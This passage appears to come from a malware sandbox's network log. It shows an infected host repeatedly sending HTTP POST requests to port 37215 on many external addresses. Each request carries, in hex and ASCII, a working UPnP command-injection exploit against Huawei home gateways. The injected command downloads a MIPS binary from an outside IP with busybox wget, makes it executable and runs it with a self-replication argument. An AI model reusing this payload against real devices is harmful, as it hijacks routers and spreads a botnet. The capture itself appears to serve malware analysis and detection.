6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  119192.168.2.134218072.21.246.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654500008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  120192.168.2.1348218157.203.22.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654514074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  121192.168.2.1335750197.44.208.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654522896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  122192.168.2.1356596197.104.30.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654572010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  123192.168.2.1338560157.105.179.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654572010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  124192.168.2.13441164.140.41.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654648066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  125192.168.2.1356834197.252.255.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654692888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  126192.168.2.1357692157.205.9.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654701948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  127192.168.2.133675641.206.172.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.658379078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  128192.168.2.133331241.19.104.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662000895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  129192.168.2.1338358157.3.170.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.662058115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
